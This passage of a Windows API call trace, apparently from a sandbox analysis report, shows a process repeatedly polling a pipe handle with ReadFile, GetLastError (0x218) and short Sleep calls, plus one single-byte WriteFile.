	[0215.251] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.266] GetLastError () returned 0x218
	[0215.330] Sleep (dwMilliseconds=0xa) 
	[0215.412] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.412] GetLastError () returned 0x218
	[0215.412] Sleep (dwMilliseconds=0x3e8) 
	[0216.420] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0216.420] Sleep (dwMilliseconds=0xa) 
	[0216.435] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.435] GetLastError () returned 0x218
	[0216.435] Sleep (dwMilliseconds=0xa) 
	[0216.452] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.452] GetLastError () returned 0x218
	[0216.452] Sleep (dwMilliseconds=0xa) 
	[0216.467] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.467] GetLastError () returned 0x218
	[0216.467] Sleep (dwMilliseconds=0xa) 
	[0216.482] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.482] GetLastError () returned 0x218
	[0216.483] Sleep (dwMilliseconds=0xa) 
	[0216.530] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.530] GetLastError () returned 0x218
	[0216.530] Sleep (dwMilliseconds=0xa) 
	[0216.575] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.575] GetLastError () returned 0x218
	[0216.575] Sleep (dwMilliseconds=0xa) 
	[0216.604] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.604] GetLastError () returned 0x218
	[0216.604] Sleep (dwMilliseconds=0xa) 
	[0216.607] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.607] GetLastError () returned 0x218
	[0216.607] Sleep (dwMilliseconds=0xa) 
	[0216.622] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.623] GetLastError () returned 0x218
	[0216.623] Sleep (dwMilliseconds=0xa) 
	[0216.638] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.638] GetLastError () returned 0x218
	[0216.638] Sleep (dwMilliseconds=0xa) 
	[0216.654] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.654] GetLastError () returned 0x218
	[0216.654] Sleep (dwMilliseconds=0xa) 
	[0216.669] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.669] GetLastError () returned 0x218
	[0216.669] Sleep (dwMilliseconds=0xa) 
	[0216.685] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.685] GetLastError () returned 0x218
	[0216.685] Sleep (dwMilliseconds=0xa) 
	[0216.732] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.732] GetLastError () returned 0x218
	[0216.732] Sleep (dwMilliseconds=0xa) 
	[0216.779] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.779] GetLastError () returned 0x218
	[0216.779] Sleep (dwMilliseconds=0xa) 
	[0216.802] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.802] GetLastError () returned 0x218
	[0216.802] Sleep (dwMilliseconds=0xa) 
	[0216.810] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.810] GetLastError () returned 0x218
	[0216.810] Sleep (dwMilliseconds=0xa) 
	[0216.840] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.840] GetLastError () returned 0x218
	[0216.840] Sleep (dwMilliseconds=0xa) 
	[0216.841] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.841] GetLastError () returned 0x218
	[0216.841] Sleep (dwMilliseconds=0xa) 
	[0216.856] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.857] GetLastError () returned 0x218
	[0216.857] Sleep (dwMilliseconds=0xa) 
	[0216.872] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.872] GetLastError () returned 0x218
	[0216.872] Sleep (dwMilliseconds=0xa) 
	[0216.888] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.888] GetLastError () returned 0x218
	[0216.888] Sleep (dwMilliseconds=0xa) 
	[0216.904] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.904] GetLastError () returned 0x218
	[0216.904] Sleep (dwMilliseconds=0xa) 
	[0216.950] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0216.950] GetLastError () returned 0x218
	[0216.950] Sleep (dwMilliseconds=0xa) 
	[0217.028] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0217.028] GetLastError () returned 0x218
	[0217.028] Sleep (dwMilliseconds=0xa) 
	[0217.094] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0217.094] GetLastError () returned 0x218
	[0217.094] Sleep (dwMilliseconds=0xa) 
	[0217.137] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0217.137] GetLastError () returned 0x218
	[0217.137] Sleep (dwMilliseconds=0xa) 
	[0218.705] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.705] GetLastError () returned 0x218
	[0218.705] Sleep (dwMilliseconds=0xa) 
	[0218.744] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.744] GetLastError () returned 0x218
	[0218.744] Sleep (dwMilliseconds=0xa) 
	[0218.791] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.791] GetLastError () returned 0x218
	[0218.791] Sleep (dwMilliseconds=0xa) 
	[0218.815] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.815] GetLastError () returned 0x218
	[0218.815] Sleep (dwMilliseconds=0xa) 
	[0218.838] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.838] GetLastError () returned 0x218
	[0218.838] Sleep (dwMilliseconds=0xa) 
	[0218.853] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.853] GetLastError () returned 0x218
	[0218.853] Sleep (dwMilliseconds=0xa) 
	[0218.869] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.869] GetLastError () returned 0x218
	[0218.869] Sleep (dwMilliseconds=0xa) 
	[0218.885] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.885] GetLastError () returned 0x218
	[0218.885] Sleep (dwMilliseconds=0xa) 
	[0218.900] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.900] GetLastError () returned 0x218
	[0218.900] Sleep (dwMilliseconds=0xa) 
	[0218.916] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.916] GetLastError () returned 0x218
	[0218.917] Sleep (dwMilliseconds=0xa) 
	[0218.964] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0218.964] GetLastError () returned 0x218
	[0218.964] Sleep (dwMilliseconds=0xa) 
	[0219.092] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.092] GetLastError () returned 0x218
	[0219.092] Sleep (dwMilliseconds=0xa) 
	[0219.774] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.774] GetLastError () returned 0x218
	[0219.774] Sleep (dwMilliseconds=0xa) 
	[0219.833] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.833] GetLastError () returned 0x218
	[0219.833] Sleep (dwMilliseconds=0xa) 
	[0219.836] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.836] GetLastError () returned 0x218
	[0219.836] Sleep (dwMilliseconds=0xa) 
	[0219.852] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.852] GetLastError () returned 0x218
	[0219.852] Sleep (dwMilliseconds=0xa) 
	[0219.867] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.867] GetLastError () returned 0x218
	[0219.867] Sleep (dwMilliseconds=0xa) 
	[0219.883] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.883] GetLastError () returned 0x218
	[0219.883] Sleep (dwMilliseconds=0xa) 
	[0219.899] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.899] GetLastError () returned 0x218
	[0219.899] Sleep (dwMilliseconds=0xa) 
	[0219.914] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.914] GetLastError () returned 0x218
	[0219.914] Sleep (dwMilliseconds=0xa) 
	[0219.930] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.930] GetLastError () returned 0x218
	[0219.930] Sleep (dwMilliseconds=0xa) 
	[0219.977] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0219.977] GetLastError () returned 0x218
	[0219.977] Sleep (dwMilliseconds=0xa) 
	[0220.023] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.023] GetLastError () returned 0x218
	[0220.024] Sleep (dwMilliseconds=0xa) 
	[0220.053] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.053] GetLastError () returned 0x218
	[0220.053] Sleep (dwMilliseconds=0xa) 
	[0220.054] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.054] GetLastError () returned 0x218
	[0220.054] Sleep (dwMilliseconds=0xa) 
	[0220.070] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.070] GetLastError () returned 0x218
	[0220.070] Sleep (dwMilliseconds=0xa) 
	[0220.086] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.086] GetLastError () returned 0x218
	[0220.086] Sleep (dwMilliseconds=0xa) 
	[0220.102] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.102] GetLastError () returned 0x218
	[0220.103] Sleep (dwMilliseconds=0xa) 
	[0220.118] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.118] GetLastError () returned 0x218
	[0220.118] Sleep (dwMilliseconds=0xa) 
	[0220.133] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.133] GetLastError () returned 0x218
	[0220.133] Sleep (dwMilliseconds=0xa) 
	[0220.148] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.148] GetLastError () returned 0x218
	[0220.148] Sleep (dwMilliseconds=0xa) 
	[0220.258] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.258] GetLastError () returned 0x218
	[0220.258] Sleep (dwMilliseconds=0xa) 
	[0220.304] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.304] GetLastError () returned 0x218
	[0220.304] Sleep (dwMilliseconds=0xa) 
	[0220.329] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.329] GetLastError () returned 0x218
	[0220.329] Sleep (dwMilliseconds=0xa) 
	[0220.335] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.336] GetLastError () returned 0x218
	[0220.336] Sleep (dwMilliseconds=0xa) 
	[0220.351] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.351] GetLastError () returned 0x218
	[0220.351] Sleep (dwMilliseconds=0xa) 
	[0220.367] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.367] GetLastError () returned 0x218
	[0220.367] Sleep (dwMilliseconds=0xa) 
	[0220.383] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.383] GetLastError () returned 0x218
	[0220.383] Sleep (dwMilliseconds=0xa) 
	[0220.400] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.400] GetLastError () returned 0x218
	[0220.400] Sleep (dwMilliseconds=0xa) 
	[0220.414] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.414] GetLastError () returned 0x218
	[0220.414] Sleep (dwMilliseconds=0xa) 
	[0220.431] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.431] GetLastError () returned 0x218
	[0220.431] Sleep (dwMilliseconds=0xa) 
	[0220.476] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.476] GetLastError () returned 0x218
	[0220.476] Sleep (dwMilliseconds=0xa) 
	[0220.522] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.522] GetLastError () returned 0x218
	[0220.523] Sleep (dwMilliseconds=0xa) 
	[0220.569] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.569] GetLastError () returned 0x218
	[0220.569] Sleep (dwMilliseconds=0xa) 
	[0220.585] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.585] GetLastError () returned 0x218
	[0220.585] Sleep (dwMilliseconds=0xa) 
	[0220.602] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.603] GetLastError () returned 0x218
	[0220.603] Sleep (dwMilliseconds=0xa) 
	[0220.616] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.616] GetLastError () returned 0x218
	[0220.617] Sleep (dwMilliseconds=0xa) 
	[0220.653] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.654] GetLastError () returned 0x218
	[0220.654] Sleep (dwMilliseconds=0xa) 
	[0220.663] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.663] GetLastError () returned 0x218
	[0220.663] Sleep (dwMilliseconds=0xa) 
	[0220.678] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.679] GetLastError () returned 0x218
